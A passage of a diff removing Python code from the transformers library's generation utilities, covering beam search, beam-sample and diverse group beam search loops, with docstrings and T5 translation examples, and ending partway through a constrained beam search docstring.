this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * num_beams, vocab_size) - - #Normal execution - next_token_scores_processed = logits_processor(input_ids, next_token_scores) - next_token_scores = next_token_scores_processed + beam_scores[:, None].expand_as(next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_scores_processed,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # reshape for beam search - vocab_size = next_token_scores.shape[-1] - next_token_scores = next_token_scores.view(batch_size, num_beams * vocab_size) - - next_token_scores, next_tokens = torch.topk( - next_token_scores, 2 * num_beams, dim=1, largest=True, sorted=True - ) - - next_indices = torch_int_div(next_tokens, vocab_size) - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = beam_scorer.process( - input_ids, - next_token_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - - beam_scores = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - input_ids = torch.cat([input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], beam_idx) - - if return_dict_in_generate and output_scores: - beam_indices = tuple((beam_indices[beam_idx[i]] + (beam_idx[i],) for i in range(len(beam_indices)))) - - # increase cur_len - cur_len = cur_len + 1 - - if beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - else: - num_return_sequences = beam_scorer.num_beam_hyps_to_keep - # return only as many indices as sequences - beam_indices = tuple( - (beam_indices[i * num_beams : i * num_beams + num_return_sequences] for i in range(batch_size)) - ) - beam_indices = sum(beam_indices, ()) - - if self.config.is_encoder_decoder: - return BeamSearchEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSearchDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - def beam_sample( - self, - input_ids: torch.LongTensor, - beam_scorer: BeamScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - logits_warper: Optional[LogitsProcessorList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[BeamSampleOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **beam search multinomial - sampling** and can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - beam_scorer (`BeamScorer`): - A derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation. For more information, the documentation of [`BeamScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - logits_warper (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsWarper`] used - to warp the prediction score distribution of the language modeling head applied before multinomial - sampling at each generation step. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.BeamSampleDecoderOnlyOutput`], [`~generation_utils.BeamSampleEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSampleDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.BeamSampleEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... TopKLogitsWarper, - ... TemperatureLogitsWarper, - ... BeamSearchScorer, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - >>> # lets run beam search using 3 beams - >>> num_beams = 3 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> # instantiate beam scorer - >>> beam_scorer = BeamSearchScorer( - ... batch_size=1, - ... max_length=model.config.max_length, - ... num_beams=num_beams, - ... device=model.device, - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id)] - ... ) - >>> # instantiate logits processors - >>> logits_warper = LogitsProcessorList( - ... [ - ... TopKLogitsWarper(50), - ... TemperatureLogitsWarper(0.7), - ... ] - ... ) - - >>> outputs = model.beam_sample( - ... input_ids, beam_scorer, logits_processor=logits_processor, logits_warper=logits_warper, **model_kwargs - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt bist du?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - batch_size = len(beam_scorer._beam_hyps) - num_beams = beam_scorer.num_beams - - batch_beam_size, cur_len = input_ids.shape - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - beam_indices = ( - tuple(() for _ in range(batch_beam_size)) if (return_dict_in_generate and output_scores) else None - ) - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - beam_scores = torch.zeros((batch_size, num_beams), dtype=torch.float, device=input_ids.device) - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * num_beams, vocab_size) - - next_token_scores_processed = logits_processor(input_ids, next_token_scores) - next_token_scores = next_token_scores_processed + beam_scores[:, None].expand_as(next_token_scores) - next_token_scores = logits_warper(input_ids, next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (logits_warper(input_ids, next_token_scores_processed),) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # reshape for beam search - vocab_size = next_token_scores.shape[-1] - next_token_scores = next_token_scores.view(batch_size, num_beams * vocab_size) - - probs = nn.functional.softmax(next_token_scores, dim=-1) - - next_tokens = torch.multinomial(probs, num_samples=2 * num_beams) - next_token_scores = torch.gather(next_token_scores, -1, next_tokens) - - next_token_scores, _indices = torch.sort(next_token_scores, descending=True, dim=1) - next_tokens = torch.gather(next_tokens, -1, _indices) - - next_indices = torch_int_div(next_tokens, vocab_size) - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = beam_scorer.process( - input_ids, - next_token_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - beam_scores = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - input_ids = torch.cat([input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], beam_idx) - - if return_dict_in_generate and output_scores: - beam_indices = tuple((beam_indices[beam_idx[i]] + (beam_idx[i],) for i in range(len(beam_indices)))) - - # increase cur_len - cur_len = cur_len + 1 - - if beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - else: - num_return_sequences = beam_scorer.num_beam_hyps_to_keep - # return only as many indices as sequences - beam_indices = tuple( - (beam_indices[i * num_beams : i * num_beams + num_return_sequences] for i in range(batch_size)) - ) - beam_indices = sum(beam_indices, ()) - - if self.config.is_encoder_decoder: - return BeamSampleEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSampleDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - def group_beam_search( - self, - input_ids: torch.LongTensor, - beam_scorer: BeamScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ): - r""" - Generates sequences of token ids for models with a language modeling head using **diverse beam search - decoding** and can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - beam_scorer (`BeamScorer`): - An derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation. For more information, the documentation of [`BeamScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - - model_kwargs: - Additional model specific kwargs that will be forwarded to the `forward` function of the model. If - model is an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.BeamSearchDecoderOnlyOutput`], [`~generation_utils.BeamSearchEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSearchDecoderOnlyOutput`] if [`~generation_utils.BeamSearchDecoderOnlyOutput`] if - `model.config.is_encoder_decoder=False` and `return_dict_in_generate=True` or a - [`~generation_utils.BeamSearchEncoderDecoderOutput`] if `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... HammingDiversityLogitsProcessor, - ... BeamSearchScorer, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - - >>> # lets run diverse beam search using 6 beams - >>> num_beams = 6 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> # instantiate beam scorer - >>> beam_scorer = BeamSearchScorer( - ... batch_size=1, - ... max_length=model.config.max_length, - ... num_beams=num_beams, - ... device=model.device, - ... num_beam_groups=3, - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... HammingDiversityLogitsProcessor(5.5, num_beams=6, num_beam_groups=3), - ... MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - - >>> outputs = model.group_beam_search( - ... input_ids, beam_scorer, logits_processor=logits_processor, **model_kwargs - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt bist du?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - batch_size = len(beam_scorer._beam_hyps) - num_beams = beam_scorer.num_beams - num_beam_groups = beam_scorer.num_beam_groups - num_sub_beams = num_beams // num_beam_groups - device = input_ids.device - - batch_beam_size, cur_len = input_ids.shape - - if return_dict_in_generate and output_scores: - beam_indices = [tuple(() for _ in range(num_sub_beams * batch_size)) for _ in range(num_beam_groups)] - else: - beam_indices = None - - if num_beams * batch_size != batch_beam_size: - raise ValueError( - f"Batch dimension of `input_ids` should be {num_beams * batch_size}, but is {batch_beam_size}." - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - beam_scores = torch.full((batch_size, num_beams), -1e9, dtype=torch.float, device=device) - # initialise score of first beam of each group with 0 and the rest with 1e-9. This ensures that the beams in - # the same group don't produce same tokens everytime. - beam_scores[:, ::num_sub_beams] = 0 - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - # predicted tokens in cur_len step - current_tokens = torch.zeros(batch_size * num_beams, dtype=input_ids.dtype, device=device) - - # indices which will form the beams in the next time step - reordering_indices = torch.zeros(batch_size * num_beams, dtype=torch.long, device=device) - - # do one decoder step on all beams of all sentences in batch - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - if output_scores: - processed_score = torch.zeros_like(outputs.logits[:, -1, :]) - - for beam_group_idx in range(num_beam_groups): - group_start_idx = beam_group_idx * num_sub_beams - group_end_idx = min(group_start_idx + num_sub_beams, num_beams) - group_size = group_end_idx - group_start_idx - - # indices of beams of current group among all sentences in batch - batch_group_indices = [] - - for batch_idx in range(batch_size): - batch_group_indices.extend( - [batch_idx * num_beams + idx for idx in range(group_start_idx, group_end_idx)] - ) - group_input_ids = input_ids[batch_group_indices] - - # select outputs of beams of current group only - next_token_logits = outputs.logits[batch_group_indices, -1, :] - - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * group_size, vocab_size) - vocab_size = next_token_scores.shape[-1] - - next_token_scores_processed = logits_processor( - group_input_ids, next_token_scores, current_tokens=current_tokens, beam_group_idx=beam_group_idx - ) - next_token_scores = next_token_scores_processed + beam_scores[batch_group_indices].unsqueeze(-1) - next_token_scores = next_token_scores.expand_as(next_token_scores_processed) - - if output_scores: - processed_score[batch_group_indices] = next_token_scores_processed - - # reshape for beam search - next_token_scores = next_token_scores.view(batch_size, group_size * vocab_size) - - next_token_scores, next_tokens = torch.topk( - next_token_scores, 2 * group_size, dim=1, largest=True, sorted=True - ) - - next_indices = torch_int_div(next_tokens, vocab_size) - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = beam_scorer.process( - group_input_ids, - next_token_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - beam_scores[batch_group_indices] = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - if return_dict_in_generate and output_scores: - beam_indices[beam_group_idx] = tuple( - beam_indices[beam_group_idx][beam_idx[i]] + (beam_idx[i],) for i in range(len(beam_indices[0])) - ) - - input_ids[batch_group_indices] = group_input_ids[beam_idx] - group_input_ids = torch.cat([group_input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - current_tokens[batch_group_indices] = group_input_ids[:, -1] - - # (beam_idx // group_size) -> batch_idx - # (beam_idx % group_size) -> offset of idx inside the group - reordering_indices[batch_group_indices] = ( - num_beams * torch_int_div(beam_idx, group_size) + group_start_idx + (beam_idx % group_size) - ) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (processed_score,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - input_ids = torch.cat([input_ids, current_tokens.unsqueeze(-1)], dim=-1) - - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], reordering_indices) - - # increase cur_len - cur_len = cur_len + 1 - - if beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - else: - beam_indices = sum(beam_indices, ()) - num_return_sequences = beam_scorer.num_beam_hyps_to_keep - # return only as many indices as sequences - beam_indices = tuple( - (beam_indices[i * num_beams : i * num_beams + num_return_sequences] for i in range(batch_size)) - ) - beam_indices = sum(beam_indices, ()) - - if self.config.is_encoder_decoder: - return BeamSearchEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSearchDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - def constrained_beam_search( - self, - input_ids: torch.LongTensor, - constrained_beam_scorer: ConstrainedBeamSearchScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = None, - **model_kwargs, - ) -> Union[BeamSearchOutput, torch.LongTensor]: - - r""" - Generates sequences of token ids for models with a language modeling head using **constrained beam search - decoding** and can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - constrained_beam_scorer (`ConstrainedBeamSearchScorer`): - A derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation, while satisfying a list of positive constraints. For more information, the - documentation of [`ConstrainedBeamSearchScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - logits_warper (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsWarper`] used - to warp the prediction score distribution of the language modeling head applied before multinomial - sampling at each generation step. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`generation_utilsBeamSearchDecoderOnlyOutput`], [`~generation_utils.BeamSearchEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - 